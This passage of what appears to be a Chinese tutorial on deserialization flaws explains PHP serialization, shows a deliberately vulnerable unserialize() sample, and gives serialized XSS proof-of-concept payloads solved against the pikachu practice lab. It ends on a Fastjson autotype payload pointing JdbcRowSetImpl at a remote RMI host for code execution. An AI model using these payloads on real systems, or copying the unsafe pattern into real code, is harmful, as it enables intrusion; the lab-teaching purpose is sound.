配合上以下的函数，就能达到RCE，任意文件删除，XSS...的效果

<?php

class SerializeTest
{
  public $var = "whoami";
}

$obj = new SerializeTest();

echo serialize($obj);

结果就是这样的

解释一下，这个过程，就是把SerializeTest这个对象里面的$var属性进行序列化  ，格式如下

O(Obejetc):13("类的长度"):"SerializeTest"(类名):1(序列化的属性个数):{s(序列化的是字符串类型):3(长度):"var"(属性名);s(类型):6(长度):"whoami"(内容)}

反序列化的过程如下

<?php

class SerializeTest
{
  public $var = "whoami";
}

$get=$_GET['test'];
$test=unserialize($get);
echo $test->var;

?>

然后我们把刚才序列化之后的东西传进去

看到传入的东西被成功输出，而且是输出我们传入的东西

那么，如果我们输出一些别的东西捏！！！

O:13:"SerializeTest":1:{s:3:"var";s:29:"<script>alert("666")</script>";}

可以看见，如果过滤不严，被攻击者知道了类名，属性名，并且参数可控，而且有执行命令的操作，就会导致反序列化的漏洞！！！

那么就拿pikachu的靶场来练习一下

这没源代码我玩集贸啊？搞错了，上个源代码

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}


$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}

赶紧代码审计，可以发现它的类中用到一个$test的属性，并且通过了反序列化之后直接将test的内容输出，那就最简单的XSS攻击就好！！！

写个脚本

<?php

class S
{
   public $test;
   function __construct(){
    $this->test='<script>alert("这就是反序列化")</script>';
   }
}

$test =new S;
echo serialize($test);

?>

然后就能看见

于是把poc粘贴到那个窗口就好，成功弹窗

3.JAVA反序列化漏洞

有了上面的php反序列化之后，我们就可以来看java的反序列化了

那么我们话不多说，直接上案例

1.Fastjson反序列化

对于这个fastjson，可以说是黑客和修复人员在斗智斗勇啊！！

哈哈哈哈哈

那么，我们就来讲一下它的原理

原理

正常序列化之后就是这样的格式

那么问题就来了，它属于哪一个类呢？？？为了解决这个问题

就引入了一个罪魁祸首！！！！ Autotype！！！变成了这样！！！

那么问题就是这样的出现的

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ip:port/Exploit","autoCommit":true}